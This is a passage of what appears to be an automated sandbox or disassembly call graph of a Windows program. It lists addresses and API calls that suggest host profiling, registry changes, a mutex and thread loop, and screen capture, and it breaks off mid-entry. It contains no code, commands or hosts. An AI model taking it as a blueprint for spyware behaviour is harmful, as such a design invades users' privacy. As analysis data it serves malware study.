33250->33249 33298 3230b82 21 API calls __dosmaperr 33250->33298 33251 3230925 33253 323094f PeekNamedPipe 33251->33253 33251->33264 33252->33251 33255 3230903 33252->33255 33253->33264 33257 3230907 33255->33257 33258 3230916 GetLastError 33255->33258 33256->33258 33259 3230896 33256->33259 33300 3231262 14 API calls __dosmaperr 33257->33300 33301 323122c 14 API calls 2 library calls 33258->33301 33281 3230ad4 33259->33281 33262 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 33265 323097a 33262->33265 33264->33262 33265->33204 33269 323097c 7 API calls 33270 32308c6 33269->33270 33271 323097c 7 API calls 33270->33271 33272 32308dd 33271->33272 33299 3230aa1 14 API calls _free 33272->33299 33274->33192 33275->33198 33276->33205 33277->33203 33278->33207 33279->33209 33280->33204 33282 3230aea 33281->33282 33285 32308a2 33282->33285 33302 322e306 38 API calls 3 library calls 33282->33302 33284 3230b2e 33284->33285 33303 322e306 38 API calls 3 library calls 33284->33303 33291 323097c 33285->33291 33287 3230b3f 33287->33285 33304 322e306 38 API calls 3 library calls 33287->33304 33289 3230b50 33289->33285 33305 322e306 38 API calls 3 library calls 33289->33305 33292 32309a2 FileTimeToSystemTime 33291->33292 33293 3230994 33291->33293 33294 32309b4 SystemTimeToTzSpecificLocalTime 33292->33294 33295 323099a 33292->33295 33293->33292 33293->33295 33294->33295 33296 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 33295->33296 33297 32308b3 33296->33297 33297->33269 33298->33249 33299->33264 33300->33264 33301->33264 33302->33284 33303->33287 33304->33289 33305->33285 33306 322a135 33307 322a141 __FrameHandler3::FrameUnwindToState 33306->33307 33332 3229e5b 33307->33332 33309 322a148 33310 322a2a1 33309->33310 33320 322a172 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 33309->33320 33359 322a4a5 4 API calls 2 library calls 33310->33359 33312 322a2a8 33313 322a2ae 33312->33313 33360 322df5e 23 API calls std::locale::_Setgloballocale 33312->33360 33361 322df22 23 API calls std::locale::_Setgloballocale 33313->33361 33316 322a2b6 33317 322a191 33318 322a212 33343 323431b 33318->33343 33320->33317 33320->33318 33358 322df38 37 API calls 4 library calls 33320->33358 33322 322a218 33347 3220db0 33322->33347 33333 3229e64 33332->33333 33362 322a68f IsProcessorFeaturePresent 33333->33362 33335 3229e70 33363 322c779 10 API calls 2 library calls 33335->33363 33337 3229e75 33342 3229e79 33337->33342 33364 3234787 33337->33364 33340 3229e90 33340->33309 33342->33309 33344 3234324 33343->33344 33345 3234329 33343->33345 33377 3233e76 49 API calls 33344->33377 33345->33322 33378 320c6d0 Sleep CreateMutexA GetLastError 33347->33378 33355 3220dcf 33356 3220d80 CreateThread 33355->33356 33357 3220da0 Sleep 33356->33357 34299 3220cf0 33356->34299 33357->33357 33358->33318 33359->33312 33360->33313 33361->33316 33362->33335 33363->33337 33368 324080d 33364->33368 33367 322c798 7 API calls 2 library calls 33367->33342 33369 324081d 33368->33369 33370 3229e82 33368->33370 33369->33370 33372 3236952 33369->33372 33370->33340 33370->33367 33373 3236959 33372->33373 33374 323699c GetStdHandle 33373->33374 33375 3236a02 33373->33375 33376 32369af GetFileType 33373->33376 33374->33373 33375->33369 33376->33373 33377->33345 33379 320c709 33378->33379 33380 320c71a 33378->33380 33379->33380 33381 320c70d GetLastError 33379->33381 33385 3211600 33380->33385 33381->33380 33382 320c71c 33381->33382 33625 322df5e 23 API calls std::locale::_Setgloballocale 33382->33625 33384 320c723 33386 3211650 33385->33386 33392 321166a 33385->33392 33626 3223340 33386->33626 33387 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 33389 3211d25 33387->33389 33393 3211e90 33389->33393 33390 321165f 33642 32061f0 33390->33642 33392->33387 33394 3211ecb 33393->33394 33395 321229a 33393->33395 33398 3223340 70 API calls 33394->33398 33396 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 33395->33396 33397 32122b2 33396->33397 33455 321f4b0 33397->33455 33399 3211f15 33398->33399 33400 32061f0 114 API calls 33399->33400 33401 3211f20 33400->33401 33402 32122b6 33401->33402 33403 3211f3f 33401->33403 33933 32026a0 27 API calls 33402->33933 33920 3225920 27 API calls 3 library calls 33403->33920 33406 32122bb 33408 322f02c 25 API calls 33406->33408 33407 3211f6e 33409 3225740 27 API calls 33407->33409 33410 32122c0 33408->33410 33411 3211f8b 33409->33411 33934 322e7c6 67 API calls 4 library calls 33410->33934 33921 3223280 33411->33921 33414 32122c6 33935 3223300 27 API calls 33414->33935 33416 32122db 33418 3223340 70 API calls 33416->33418 33417 3212053 GetModuleFileNameA 33419 3212090 33417->33419 33420 32122f6 33418->33420 33419->33419 33423 3224250 27 API calls 33419->33423 33936 3223300 27 API calls 33420->33936 33421 3211f9d _AnonymousOriginator 33421->33406 33421->33417 33422 3212049 _AnonymousOriginator 33421->33422 33422->33417 33431 32120ac _AnonymousOriginator 33423->33431 33425 3212309 33937 322df5e 23 API calls std::locale::_Setgloballocale 33425->33937 33427 3212144 33926 322e1e0 28 API calls 33427->33926 33428 321231c 33430 322f02c 25 API calls 33428->33430 33433 3212321 33430->33433 33431->33427 33431->33428 33434 3212215 _AnonymousOriginator 33431->33434 33432 321215b 33432->33410 33436 3212166 33432->33436 33434->33395 33434->33428 33435 3212290 _AnonymousOriginator 33434->33435 33435->33395 33927 3209ed0 GetFileAttributesA 33436->33927 33438 3212171 33439 3212189 33438->33439 33441 3212182 CreateDirectoryA 33438->33441 33928 3209ed0 GetFileAttributesA 33439->33928 33441->33439 33442 3212194 33444 3223340 70 API calls 33442->33444 33453 32121c6 33442->33453 33446 32121af 33444->33446 33445 32121d4 33445->33425 33932 3223300 27 API calls 33445->33932 33929 320a8c0 28 API calls __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 33446->33929 33449 32121bd 33930 3211080 28 API calls 2 library calls 33449->33930 33450 32121f1 33452 3223340 70 API calls 33450->33452 33454 321220c 33452->33454 33931 3209ea0 68 API calls 33453->33931 33454->33420 33456 321f4e8 33455->33456 33938 32078e0 33456->33938 33459 3223280 25 API calls 33460 321f506 33459->33460 33461 321f536 _AnonymousOriginator 33460->33461 33463 3220cca 33460->33463 33954 32093d0 33461->33954 33466 322f02c 25 API calls 33463->33466 33464 321f545 34068 32043e0 33464->34068 33468 3220ce3 33466->33468 33471 32043e0 27 API calls 33472 321f56b RegOpenKeyExA RegCloseKey 33471->33472 33473 32043e0 27 API calls 33472->33473 33474 321f5bb 33473->33474 33475 3223340 70 API calls 33474->33475 33476 321f5d9 33475->33476 33477 32061f0 114 API calls 33476->33477 33478 321f5e0 33477->33478 33479 3223340 70 API calls 33478->33479 33480 321f5f5 33479->33480 33481 32061f0 114 API calls 33480->33481 33482 321f5fc 33481->33482 33483 321f613 GetUserNameA 33482->33483 33484 321f666 33483->33484 33484->33484 33485 3224250 27 API calls 33484->33485 33486 321f682 33485->33486 34098 320b250 GetComputerNameExW 33486->34098 33491 321f6e3 33491->33491 33492 3224250 27 API calls 33491->33492 33493 321f6fb 33492->33493 34238 3209e20 33493->34238 33496 32043e0 27 API calls 33497 321f71d 33496->33497 33498 3223340 70 API calls 33497->33498 33499 321f737 33498->33499 33500 32061f0 114 API calls 33499->33500 33501 321f742 33500->33501 33502 32043e0 27 API calls 33501->33502 33503 321f759 33502->33503 33504 3223340 70 API calls 33503->33504 33505 321f76f 33504->33505 33506 32061f0 114 API calls 33505->33506 33507 321f77a 33506->33507 33508 3223340 70 API calls 33507->33508 33509 321f79d 33508->33509 33510 32061f0 114 API calls 33509->33510 33511 321f7a8 33510->33511 33512 3223340 70 API calls 33511->33512 33513 321f7cb 33512->33513 33514 32061f0 114 API calls 33513->33514 33515 321f7d6 33514->33515 33516 3223340 70 API calls 33515->33516 33517 321f7f9 33516->33517 33518 32061f0 114 API calls 33517->33518 33519 321f804 33518->33519 33520 3223340 70 API calls 33519->33520 33521 321f827 33520->33521 33522 32061f0 114 API calls 33521->33522 33523 321f832 33522->33523 33524 3223340 70 API calls 33523->33524 33525 321f855 33524->33525 33526 32061f0 114 API calls 33525->33526 33527 321f860 33526->33527 33528 3223340 70 API calls 33527->33528 33529 321f883 33528->33529 33530 32061f0 114 API calls 33529->33530 33531 321f88e 33530->33531 33532 3223340 70 API calls 33531->33532 33533 321f8b1 33532->33533 33534 32061f0 114 API calls 33533->33534 33535 321f8bc 33534->33535 33536 3223340 70 API calls 33535->33536 33537 321f8dd 33536->33537 33538 32061f0 114 API calls 33537->33538 33539 321f8e8 33538->33539 33540 3223340 70 API calls 33539->33540 33541 321f8fa 33540->33541 33542 32061f0 114 API calls 33541->33542 33543 321f905 33542->33543 33544 3223340 70 API calls 33543->33544 33545 321f917 33544->33545 33546 32061f0 114 API calls 33545->33546 33547 321f922 33546->33547 33548 3223340 70 API calls 33547->33548 33549 321f93f 33548->33549 33550 32061f0 114 API calls 33549->33550 33551 321f94a 33550->33551 34246 32248f0 33551->34246 33553 321f95e 33554 3225740 27 API calls 33553->33554 33555 321f978 33554->33555 33556 3225740 27 API calls 33555->33556 33557 321f995 33556->33557 33558 3225740 27 API calls 33557->33558 33559 321f9b2 33558->33559 33560 32248f0 27 API calls 33559->33560 33561 321f9c7 33560->33561 33562 3225740 27 API calls 33561->33562 33563 321f9e6 33562->33563 33564 32248f0 27 API calls 33563->33564 33565 321f9fb 33564->33565 33566 3225740 27 API calls 33565->33566 33567 321fa1a 33566->33567 33568 32248f0 27 API calls 33567->33568 33569 321fa2f 33568->33569 33570 3225740 27 API calls 33569->33570 33571 321fa4e 33570->33571 33572 32248f0 27 API calls 33571->33572 33573 321fa63 33572->33573 33574 3225740 27 API calls 33573->33574 33575 321fa82 33574->33575 33576 32248f0 27 API calls 33575->33576 33577 321fa97 33576->33577 33578 3225740 27 API calls 33577->33578 33579 321fab6 33578->33579 33580 32248f0 27 API calls 33579->33580 33581 321facb 33580->33581 33582 3225740 27 API calls 33581->33582 33583 321faea 33582->33583 33584 32248f0 27 API calls 33583->33584 33585 321faff 33584->33585 33586 3225740 27 API calls 33585->33586 33587 321fb1e 33586->33587 33588 32248f0 27 API calls 33587->33588 33589 321fb33 33588->33589 33590 3225740 27 API calls 33589->33590 33591 321fb52 33590->33591 33592 3225740 27 API calls 33591->33592 33593 321fb74 33592->33593 33594 3225740 27 API calls 33593->33594 33595 321fb96 33594->33595 33596 32248f0 27 API calls 33595->33596 33597 321fbab _AnonymousOriginator 33596->33597 33598 32207d3 33597->33598 33599 32208a8 33597->33599 33600 3223340 70 API calls 33598->33600 33601 3223340 70 API calls 33599->33601 33602 32207e9 33600->33602 33603 32208bd 33601->33603 33604 32061f0 114 API calls 33602->33604 33605 3223340 70 API calls 33603->33605 33606 32207f4 33604->33606 33607 32208d2 33605->33607 33608 32248f0 27 API calls 33606->33608 34250 3204d60 27 API calls _AnonymousOriginator 33607->34250 33610 3220808 33608->33610 33613 3223280 25 API calls 33610->33613 33611 32208e1 34251 320cb00 27 API calls 33611->34251 33623 3220816 _AnonymousOriginator 33613->33623 33614 32208f2 33615 3223340 70 API calls 33614->33615 33616 3220907 33615->33616 33617 32061f0 114 API calls 33616->33617 33618 3220912 33617->33618 33619 3225740 27 API calls 33618->33619 33620 322092c 33619->33620 33621 3223280 25 API calls 33620->33621 33621->33623 33622 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 33624 3220cc6 33622->33624 33623->33622 33624->33355 33625->33384 33627 322336b 33626->33627 33628 3223372 33627->33628 33629 32233c4 33627->33629 33630 32233a5 33627->33630 33628->33390 33637 32233b9 _Yarn 33629->33637 33807 32025c0 27 API calls 3 library calls 33629->33807 33631 32233fa 33630->33631 33632 32233ac 33630->33632 33808 32025c0 27 API calls 2 library calls 33631->33808 33806 32025c0 27 API calls 3 library calls 33632->33806 33636 32233b2 33636->33637 33809 322f02c 33636->33809 33637->33390 33815 3205da0 33642->33815 33648 320630f 33651 322f02c 25 API calls 33648->33651 33649 320625f _AnonymousOriginator 33649->33648 33654 32062e9 _AnonymousOriginator 33649->33654 33650 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 33652 320630b 33650->33652 33653 3206314 __fread_nolock 33651->33653 33652->33392 33655 3206377 RegOpenKeyExA 33653->33655 33654->33650 33656 32063d0 RegCloseKey 33655->33656 33657 32063a6 RegQueryValueExA 33655->33657 33658 3206400 33656->33658 33657->33656 33658->33658 33830 3224250 33658->33830 33660 3206480 _AnonymousOriginator 33661 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 33660->33661 33664 32064a3 33661->33664 33662 32064a7 33665 322f02c 25 API calls 33662->33665 33663 3206418 _AnonymousOriginator 33663->33660 33663->33662 33664->33392 33666 32064ac RegOpenKeyExA 33665->33666 33668 3206517 RegCloseKey 33666->33668 33669 32064ed RegSetValueExA 33666->33669 33670 3206528 _AnonymousOriginator 33668->33670 33669->33668 33671 32065ce _AnonymousOriginator 33670->33671 33672 32065e6 33670->33672 33674 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 33671->33674 33673 322f02c 25 API calls 33672->33673 33675 32065eb 33673->33675 33676 32065e2 33674->33676 33845 3231b97 33675->33845 33676->33392 33679 3206665 RegCloseKey 33681 3206676 _AnonymousOriginator 33679->33681 33680 3206646 RegSetValueExA 33680->33679 33682 320671c _AnonymousOriginator 33681->33682 33683 3206734 33681->33683 33684 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 33682->33684 33685 322f02c 25 API calls 33683->33685 33686 3206730 33684->33686 33687 3206739 __wsopen_s 33685->33687 33686->33392 33688 3223340 70 API calls 33687->33688 33689 32067a0 33688->33689 33690 32061f0 74 API calls 33689->33690 33691 32067ab RegOpenKeyExA 33690->33691 33694 32067d9 __fread_nolock _AnonymousOriginator 33691->33694 33693 3206d64 33695 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 33693->33695 33694->33693 33696 3206d80 33694->33696 33699 3206829 RegQueryInfoKeyW 33694->33699 33697 3206d7c 33695->33697 33698 322f02c 25 API calls 33696->33698 33697->33392 33700 3206d85 GdiplusStartup 33698->33700 33701 3206d58 RegCloseKey 33699->33701 33782 32068a8 _AnonymousOriginator 33699->33782 33703 3206e39 33700->33703 33713 3206e13 33700->33713 33701->33693 33702 32068b2 RegEnumValueA 33702->33782 33704 3207534 33703->33704 33705 3206e45 33703->33705 33869 32026a0 27 API calls 33704->33869 33849 32256e0 27 API calls std::_Facet_Register 33705->33849 33707 3207539 33709 322f02c 25 API calls 33707->33709 33708 3224250 27 API calls 33708->33782 33712 3207552 GetUserNameA LookupAccountNameA GetSidIdentifierAuthority 33709->33712 33710 3206f60 GetDC 33714 3223340 70 API calls 33710->33714 33717 3223340 70 API calls 33712->33717 33713->33710 33713->33713 33716 3206f8b 33714->33716 33718 32061f0 74 API calls 33716->33718 33720 3207626 33717->33720 33721 3206f96 33718->33721 33719 3223340 70 API calls 33719->33782 33722 32061f0 74 API calls 33720->33722 33723 3223340 70 API calls 33721->33723 33724 3207631 33722->33724 33725 3206fb3 33723->33725 33870 3202400 44 API calls 33724->33870 33726 32061f0 74 API calls 33725->33726 33727 3206fba 33726->33727 33729 3223340 70 API calls 33727->33729 33730 3206fcf 33729->33730 33731 32061f0 74 API calls 33730->33731 33734 3206fd6 33731->33734 33732 32078c3 33735 322f02c 25 API calls 33732->33735 33733 3207649 _AnonymousOriginator 33733->33732 33736 3223340 70 API calls 33733->33736 33739 3223340 70 API calls 33734->33739 33737 32078c8 33735->33737 33738 32076b2 33736->33738 33740 322f02c 25 API calls 33737->33740 33741 32061f0 74 API calls 33738->33741 33742 3207002 33739->33742 33743 32078cd 33740->33743 33744 32076bd 33741->33744 33745 32061f0 74 API calls 33742->33745 33746 322f02c 25 API calls 33743->33746 33871 3202400 44 API calls 33744->33871 33747 320700d 33745->33747 33748 32078d2 33746->33748 33850 3225740 33747->33850 33751 320771a GetSidSubAuthorityCount 33753 32077d2 33751->33753 33777 3207734 _AnonymousOriginator 33751->33777 33752 3207024 33754 3225740 27 API calls 33752->33754 33758 3224250 27 API calls 33753->33758 33763 320703b _AnonymousOriginator 33754->33763 33755 32076d7 _AnonymousOriginator 33755->33737 33755->33751 33756 3207740 GetSidSubAuthority 33757 3223340 70 API calls 33756->33757 33757->33777 33760 3207822 33758->33760 33759 32061f0 74 API calls 33759->33777 33762 3224250 27 API calls 33760->33762 33761 320715f _AnonymousOriginator 33764 3223340 70 API calls 33761->33764 33765 320786f 33762->33765 33763->33707 33763->33761 33767 320719f 33764->33767 33765->33743 33768 320789b _AnonymousOriginator 33765->33768 33770 32061f0 74 API calls 33767->33770 33769 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 33768->33769 33771 32078bf 33769->33771 33772 32071aa 33770->33772 33771->33392 33773 32071b3 33772->33773 33774 32071b5 RegGetValueA 33772->33774 33773->33774 33780 32071e5 _AnonymousOriginator 33774->33780 33775 3207226 GetSystemMetrics 33778 3207234 33775->33778 33779 320722d 33775->33779 33776 320722f GetSystemMetrics 33776->33778 33777->33732 33777->33753 33777->33756 33777->33759 33872 3202400 44 API calls 33777->33872 33781 3223340 70 API calls 33778->33781 33779->33776 33780->33775 33780->33776 33783 320724f 33781->33783 33782->33696 33782->33701 33782->33702 33782->33708 33782->33719 33784 32061f0 74 API calls 33782->33784 33785 32061f0 74 API calls 33783->33785 33784->33782 33786 320725a RegGetValueA 33785->33786 33788 320728f _AnonymousOriginator 33786->33788 33789 32072d3 GetSystemMetrics 33788->33789 33790 32072ca GetSystemMetrics 33788->33790 33792 32072d8 6 API calls 33789->33792 33791 32072d1 33790->33791 33790->33792 33791->33789 33793 32073f8 6 API calls 33792->33793 33794 320736b 33792->33794 33796 320744f _AnonymousOriginator 33793->33796 33867 3232699 15 API calls 3 library calls 33794->33867 33797 32074e0 GdiplusShutdown 33796->33797 33803 32074f1 _AnonymousOriginator 33797->33803 33798 3207371 33798->33793 33799 3207380 GdipGetImageEncoders 33798->33799 33805 3207394 33799->33805 33800 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 33801 3207530 33800->33801 33801->33392 33803->33800 33804 32073ef 33804->33793 33868 3231e51 14 API calls _free 33805->33868 33806->33636 33807->33637 33808->33636 33814 322efb8 25 API calls 3 library calls 33809->33814 33811 322f03b 33812 322f049 __Getctype 11 API calls 33811->33812 33813 322f048 33812->33813 33814->33811 33873 3224110 27 API calls 3 library calls 33815->33873 33817 3205dd1 33818 3206060 33817->33818 33874 3224110 27 API calls 3 library calls 33818->33874 33820 32061c6 33823 32051a0 33820->33823 33822 3206095 33822->33820 33875 32303c0 40 API calls __Getctype 33822->33875 33824 3205432 33823->33824 33828 3205204 33823->33828 33824->33649 33825 3205355 33825->33824 33878 3225220 27 API calls 3 library calls 33825->33878 33828->33825 33876 32303c0 40 API calls __Getctype 33828->33876 33877 3225220 27 API calls 3 library calls 33828->33877 33833 3224294 33830->33833 33835 322426e _Yarn 33830->33835 33831 322437e 33881 32026a0 27 API calls 33831->33881 33833->33831 33836 32242e8 33833->33836 33837 322430d 33833->33837 33834 3224383 33882 32025c0 27 API calls 2 library calls 33834->33882 33835->33663 33836->33834 33879 32025c0 27 API calls 3 library calls 33836->33879 33842 32242f9 _Yarn 33837->33842 33880 32025c0 27 API calls 3 library calls 33837->33880 33839 3224388 _AnonymousOriginator 33839->33663 33843 3224360 _AnonymousOriginator 33842->33843 33844 322f02c 25 API calls 33842->33844 33843->33663 33844->33831 33846 3231bb2 33845->33846 33883 32312c1 33846->33883 33849->33713 33851 3225783 33850->33851 33852 3225910 33851->33852 33853 3225850 33851->33853 33857 3225788 _Yarn 33851->33857 33918 32026a0 27 API calls 33852->33918 33858 3225885 33853->33858 33859 32258ab 33853->33859 33855 3225915 33919 32025c0 27 API calls 2 library calls 33855->33919 33857->33752 33858->33855 33861 3225890 33858->33861 33866 322589d _Yarn 33859->33866 33917 32025c0 27 API calls 3 library calls 33859->33917 33860 3225896 33863 322f02c 25 API calls 33860->33863 33860->33866 33916 32025c0 27 API calls 3 library calls 33861->33916 33865 322591f 33863->33865 33866->33752 33867->33798 33868->33804 33870->33733 33871->33755 33872->33777 33873->33817 33874->33822 33875->33822 33876->33828 33877->33828 33878->33825 33879->33842 33880->33842 33882->33839 33901 3230147 33883->33901 33885 323130c 33886 322e1f7 __cftoe 37 API calls 33885->33886 33893 3231318 33886->33893 33887 32312d3 33887->33885 33888 32312e8 33887->33888 33900 320661c RegOpenKeyExA 33887->33900 33908 3231262 14 API calls __dosmaperr 33888->33908 33890 32312ed 33909 322f01c 25 API calls __wsopen_s 33890->33909 33894 3231347 33893->33894 33910 3231b43 40 API calls 2 library calls 33893->33910 33897 32313b1 33894->33897 33911 3231aec 25 API calls 2 library calls 33894->33911 33912 3231aec 25 API calls 2 library calls 33897->33912 33898 3231477 33898->33900 33913 3231262 14 API calls __dosmaperr 33898->33913 33900->33679 33900->33680 33902 323015f 33901->33902 33903 323014c 33901->33903 33902->33887 33914 3231262 14 API calls __dosmaperr 33903->33914 33905 3230151 33915 322f01c 25 API calls __wsopen_s 33905->33915 33907 323015c 33907->33887 33908->33890 33909->33900 33910->33893 33911->33897 33912->33898 33913->33900 33914->33905 33915->33907 33916->33860 33917->33866 33919->33860 33920->33407 33922 32232b1 _AnonymousOriginator 33921->33922 33923 322328e 33921->33923 33922->33421 33923->33922 33924 322f02c 25 API calls 33923->33924 33925 32232fc 33924->33925 33926->33432 33927->33438 33928->33442 33929->33449 33930->33453 33931->33445 33932->33450 33934->33414 33935->33416 33936->33425 33937->33428 33939 3207c4a 33938->33939 33953 320795f _AnonymousOriginator 33938->33953 33940 3207d12 33939->33940 33941 3207c73 33939->33941 34253 3224760 27 API calls 33940->34253 33942 3224250 27 API calls 33941->33942 33948 3207c92 _AnonymousOriginator 33942->33948 33944 3207d17 33945 322f02c 25 API calls 33944->33945 33947 3207d1c 33945->33947 33946 3207ce8 _AnonymousOriginator 33949 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 33946->33949 33948->33944 33948->33946 33950 3207d0b 33949->33950 33950->33459 33951 3224250 27 API calls 33951->33953 33953->33939 33953->33940 33953->33944 33953->33951 34252 3225aa0 27 API calls _Yarn 33953->34252 34254 322b650 33954->34254 33957 3209458 33958 3223340 70 API calls 33957->33958 33961 3209467 33958->33961 33959 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 33960 3209a0d 33959->33960 33960->33464 33962 32061f0 114 API calls 33961->33962 33963 3209472 33962->33963 33964 3223340 70 API calls 33963->33964 33965 3209494 33964->33965 33966 32061f0 114 API calls 33965->33966 33967 320949f GetModuleHandleA GetProcAddress 33966->33967 33969 32094c5 _AnonymousOriginator 33967->33969 33970 3209546 _AnonymousOriginator 33969->33970 33971 3209a14 33969->33971 33972 3209573 GetNativeSystemInfo 33970->33972 33973 3209577 GetSystemInfo 33970->33973 33974 3209a19 33971->33974 33975 322f02c 25 API calls 33971->33975 33977 320957d 33972->33977 33973->33977 33976 322f02c 25 API calls 33974->33976 33975->33974 33978 3209a1e __fread_nolock 33976->33978 33979 32096b9 33977->33979 33980 32095df 33977->33980 34017 3209588 _AnonymousOriginator 33977->34017 33981 3209a85 GetVersionExW 33978->33981 33984 3223340 70 API calls 33979->33984 33982 3223340 70 API calls 33980->33982 33983 3209aad 33981->33983 34025 3209aa3 33981->34025 33986 3209600 33982->33986 33985 3223340 70 API calls 33983->33985 33987 32096e5 33984->33987 33988 3209abc 33985->33988 33989 32061f0 114 API calls 33986->33989 33991 32061f0 114 API calls 33987->33991 33993 32061f0 114 API calls 33988->33993 33994 3209607 33989->33994 33990 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 33995 3209c05 33990->33995 33992 32096ec 33991->33992 33996 3223340 70 API calls 33992->33996 33997 3209ac7 33993->33997 33998 3223340 70 API calls 33994->33998 33995->33464 33999 3209704 33996->33999 34002 3223340 70 API calls 33997->34002 34000 320961f 33998->34000 34001 32061f0 114 API calls 33999->34001 34003 32061f0 114 API calls 34000->34003 34004 320970b 34001->34004 34005 3209ae9 34002->34005 34008 3209626 34003->34008 34009 3223340 70 API calls 34004->34009 34006 32061f0 114 API calls 34005->34006 34007 3209af4 GetModuleHandleA GetProcAddress 34006->34007 34016 3209b1a _AnonymousOriginator 34007->34016 34256 3231e8f 40 API calls 34008->34256 34012 320973c 34009->34012 34015 32061f0 114 API calls 34012->34015 34013 3209b97 _AnonymousOriginator 34018 3209bc8 GetSystemInfo 34013->34018 34013->34025 34014 3209651 34014->33974 34014->34017 34019 3209743 34015->34019 34016->34013 34020 3209c0c 34016->34020 34017->33959 34018->34025 34257 32091b0 123 API calls 3 library calls 34019->34257 34021 322f02c 25 API calls 34020->34021 34023 3209c11 34021->34023 34024 3209752 34026 3223340 70 API calls 34024->34026 34025->33990 34027 320978d 34026->34027 34028 32061f0 114 API calls 34027->34028 34029 3209794 34028->34029 34030 3223340 70 API calls 34029->34030 34031 32097ac 34030->34031 34032 32061f0 114 API calls 34031->34032 34033 32097b3 34032->34033 34034 3223340 70 API calls 34033->34034 34035 32097e4 34034->34035 34036 32061f0 114 API calls 34035->34036 34037 32097eb 34036->34037 34258 32091b0 123 API calls 3 library calls 34037->34258 34039 32097fa 34040 3223340 70 API calls 34039->34040 34041 3209835 34040->34041 34042 32061f0 114 API calls 34041->34042 34043 320983c 34042->34043 34044 3223340 70 API calls 34043->34044 34045 3209854 34044->34045 34046 32061f0 114 API calls 34045->34046 34047 320985b 34046->34047 34048 3223340 70 API calls 34047->34048 34049 320988c 34048->34049 34050 32061f0 114 API calls 34049->34050 34051 3209893 34050->34051 34259 32091b0 123 API calls 3 library calls 34051->34259 34053 32098a2 34054 3223340 70 API calls 34053->34054 34055 32098dd 34054->34055 34056 32061f0 114 API calls 34055->34056 34057 32098e4 34056->34057 34058 3223340 70 API calls 34057->34058 34059 32098fc 34058->34059 34060 32061f0 114 API calls 34059->34060 34061 3209903 34060->34061 34062 3223340 70 API calls 34061->34062 34063 3209934 34062->34063 34064 32061f0 114 API calls 34063->34064 34065 320993b 34064->34065 34260 32091b0 123 API calls 3 library calls 34065->34260 34067 320994a 34067->34017 34069 3204404 34068->34069 34069->34069 34070 320447d 34069->34070 34071 3224250 27 API calls 34069->34071 34072 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 34070->34072 34071->34070 34073 320448c 34072->34073 34074 3209a20 34073->34074 34075 322b650 __fread_nolock 34074->34075 34076 3209a85 GetVersionExW 34075->34076 34077 3209aa3 34076->34077 34078 3209aad 34076->34078 34081 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 34077->34081 34079 3223340 70 API calls 34078->34079 34080 3209abc 34079->34080 34082 32061f0 114 API calls 34080->34082 34083 3209c05 34081->34083 34084 3209ac7 34082->34084 34083->33471 34085 3223340 70 API calls 34084->34085 34086 3209ae9 34085->34086 34087 32061f0 114 API calls 34086->34087 34088 3209af4 34087->34088 34089 3209afd 34088->34089 34090 3209aff GetModuleHandleA GetProcAddress 34088->34090 34089->34090 34091 3209b1a _AnonymousOriginator 34090->34091 34093 3209c0c 34091->34093 34094 3209b97 _AnonymousOriginator 34091->34094 34092 3209bc8 GetSystemInfo 34096 3209bc4 34092->34096 34095 322f02c 25 API calls 34093->34095 34094->34092 34094->34096 34097 3209c11 34095->34097 34096->34077 34099 320b2e0 34098->34099 34099->34099 34100 320b331 34099->34100 34101 320b4ab 34099->34101 34107 320b2f4 _Yarn 34099->34107 34275 32256e0 27 API calls std::_Facet_Register 34100->34275 34276 32026a0 27 API calls 34101->34276 34103 320b4b0 34106 322f02c 25 API calls 34103->34106 34108 320b4b5 34106->34108 34261 3223010 34107->34261 34109 320b3e7 34109->34103 34111 320b483 _AnonymousOriginator 34109->34111 34110 32299c0 